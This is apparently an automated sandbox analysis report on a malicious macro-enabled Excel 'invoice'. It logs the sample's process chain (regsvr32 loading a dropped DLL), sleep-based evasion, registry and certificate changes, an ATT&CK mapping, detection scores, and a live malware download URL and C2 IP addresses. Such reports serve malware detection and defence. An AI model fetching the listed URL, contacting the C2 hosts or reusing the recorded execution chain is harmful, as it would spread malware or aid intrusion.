Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -1548000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -369000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -1264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -277000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -830000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -333000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -417000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -564000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -281000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -530000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -520000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -580000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -636000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -154000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -438000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -441000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -552000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -578000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -274000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -465000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -399000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -488000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -287000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -249000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -346000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -259000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -136000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -321000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -358000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2908 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001A88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001CB5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001CB6E0 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2374415929.0000000000960000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2376202937.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Mitre Att&ck Matrix

Techniques listed per tactic column (digits attached to a technique name are the matched-signature counts as shown in the report):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Scripting22, Native API1, Exploitation for Client Execution43, At (Windows), Cron, Launchd, Scheduled Task
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Privilege Escalation: Process Injection112, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Defense Evasion: Masquerading11, Virtualization/Sandbox Evasion1, Disable or Modify Tools1, Process Injection112, Scripting22, Obfuscated Files or Information1, Regsvr321
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Query Registry1, Security Software Discovery1, Virtualization/Sandbox Evasion1, Process Discovery2, Remote System Discovery1, File and Directory Discovery1, System Information Discovery13
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel2, Non-Standard Port1, Ingress Tool Transfer12, Non-Application Layer Protocol2, Application Layer Protocol23, Multiband Communication, Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
INV8073565781-20210111319595.xlsm | 44% | Virustotal |
INV8073565781-20210111319595.xlsm | 8% | Metadefender |
INV8073565781-20210111319595.xlsm | 32% | ReversingLabs | Script-Macro.Trojan.Remcos

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\cjrumqtd.dll | 100% | Joe Sandbox ML |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
wexfashion.com | 0% | Virustotal |
cdn.digicertcdn.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://5.100.228.233:3389/ | 0% | Avira URL Cloud | safe
https://80.86.91.27:3308/rt | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://80.86.91.27/ | 0% | Avira URL Cloud | safe
https://80.86.91.27/xw1 | 0% | Avira URL Cloud | safe
http://www.pub. | 0% | Avira URL Cloud | safe
http://wexfashion.com/k04qkvqu.zip | 100% | Avira URL Cloud | malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://80.86.91.27:3308/H | 0% | Avira URL Cloud | safe
https://46.105.131.65:1512/ | 0% | Avira URL Cloud | safe
https://46.105.131.65/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://80.86.91.27:3308/ | 0% | Avira URL Cloud | safe
https://77.220.64.37/2 | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://77.220.64.37/5 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://5.100.228.233/ | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
wexfashion.com | 198.54.125.162 | true | false | | unknown
cdn.digicertcdn.com | 104.18.11.39 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://wexfashion.com/k04qkvqu.zip | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | false | | high
https://5.100.228.233:3389/ | regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://investor.msn.com | DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | false | | high
https://80.86.91.27:3308/rt | regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net03 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://80.86.91.27/ | regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://80.86.91.27/xw1 | regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pub. | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | false | | high
https://80.86.91.27:3308/H | regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://46.105.131.65:1512/ | regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://46.105.131.65/ | regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmp | false | | high
https://80.86.91.27:3308/ | regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | false | | high
https://77.220.64.37/2 | regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.%s.comPA | regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmp | false | URL Reputation: safe | low
https://77.220.64.37/5 | regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | false | | high
https://5.100.228.233/ | regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2374448037.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2374547806.00000000008C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226127205.0000000002410000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | false | | high

                      Contacted IPs


                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
5.100.228.233 | unknown | Netherlands | 8315 | SENTIANL | true
80.86.91.27 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | true
46.105.131.65 | unknown | France | 16276 | OVHFR | true
198.54.125.162 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
77.220.64.37 | unknown | Italy | 44160 | INTERNETONEInternetServicesProviderIT | true

                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 338240
Start date: 11.01.2021
Start time: 20:46:41
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: INV8073565781-20210111319595.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLSM@9/21@1/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 1.6% (good quality ratio 1.4%)
• Quality average: 75.1%
• Quality standard deviation: 36.8%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210, 205.185.216.10, 205.185.216.42, 13.64.90.137, 104.18.11.39
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

Time | Type | Description
20:47:46 | API Interceptor | 1069x Sleep call for process: regsvr32.exe modified
20:48:01 | API Interceptor | 519x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | Detection
5.100.228.233 | HkNkyKl3uT.dll | malicious
5.100.228.233 | ceepq536n.zip.dll | malicious
5.100.228.233 | sample20210111-01.xlsm | malicious
5.100.228.233 | INV3867196801-20210111675616.xlsm | malicious
5.100.228.233 | hiytvys.dll | malicious
5.100.228.233 | l7rgi3xyd.dll | malicious
5.100.228.233 | ymuyks.dll | malicious
5.100.228.233 | INV9698791470-20210111920647.xlsm | malicious
5.100.228.233 | hy9x6wzip.dll | malicious
5.100.228.233 | INV7693947099-20210111388211.xlsm | malicious
5.100.228.233 | jufk0vrar.dll | malicious
80.86.91.27 | HkNkyKl3uT.dll | malicious
80.86.91.27 | ceepq536n.zip.dll | malicious
80.86.91.27 | sample20210111-01.xlsm | malicious
80.86.91.27 | INV3867196801-20210111675616.xlsm | malicious
80.86.91.27 | hiytvys.dll | malicious
80.86.91.27 | l7rgi3xyd.dll | malicious
80.86.91.27 | ymuyks.dll | malicious
80.86.91.27 | INV9698791470-20210111920647.xlsm | malicious
80.86.91.27 | hy9x6wzip.dll | malicious
80.86.91.27 | INV7693947099-20210111388211.xlsm | malicious
80.86.91.27 | jufk0vrar.dll | malicious
46.105.131.65 | HkNkyKl3uT.dll | malicious
46.105.131.65 | ceepq536n.zip.dll | malicious
46.105.131.65 | sample20210111-01.xlsm | malicious
46.105.131.65 | INV3867196801-20210111675616.xlsm | malicious
46.105.131.65 | hiytvys.dll | malicious
46.105.131.65 | l7rgi3xyd.dll | malicious
46.105.131.65 | ymuyks.dll | malicious
46.105.131.65 | INV9698791470-20210111920647.xlsm | malicious
46.105.131.65 | hy9x6wzip.dll | malicious
46.105.131.65 | INV7693947099-20210111388211.xlsm | malicious
46.105.131.65 | jufk0vrar.dll | malicious
77.220.64.37 | HkNkyKl3uT.dll | malicious
77.220.64.37 | ceepq536n.zip.dll | malicious
77.220.64.37 | sample20210111-01.xlsm | malicious
77.220.64.37 | INV3867196801-20210111675616.xlsm | malicious
77.220.64.37 | hiytvys.dll | malicious
77.220.64.37 | l7rgi3xyd.dll | malicious
77.220.64.37 | ymuyks.dll | malicious
77.220.64.37 | INV9698791470-20210111920647.xlsm | malicious
77.220.64.37 | hy9x6wzip.dll | malicious
77.220.64.37 | INV7693947099-20210111388211.xlsm | malicious
77.220.64.37 | jufk0vrar.dll | malicious
77.220.64.37 | SecuriteInfo.com.Trojan.Dridex.735.5073.dll | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xls | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1-Total New Invoices Monday Dec 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | SecuriteInfo.com.Mal.EncPk-APV.3900.dll | malicious
77.220.64.37 | ygyq4p539.rar.dll | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
cdn.digicertcdn.com | sample20210111-01.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | INV3867196801-20210111675616.xlsm | malicious | 104.18.11.39
cdn.digicertcdn.com | INV9698791470-20210111920647.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | INV7693947099-20210111388211.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | SurfsharkSetup.exe | malicious | 104.18.10.39
cdn.digicertcdn.com | https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1 | malicious | 104.18.10.39
cdn.digicertcdn.com | ASHLEY NAIDOO CV.doc | malicious | 104.18.10.39
cdn.digicertcdn.com | RFQ.doc | malicious | 104.18.10.39
cdn.digicertcdn.com | SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe | malicious | 104.18.11.39
cdn.digicertcdn.com | http://test.kunmiskincare.com/index.php | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D | malicious | 104.18.11.39
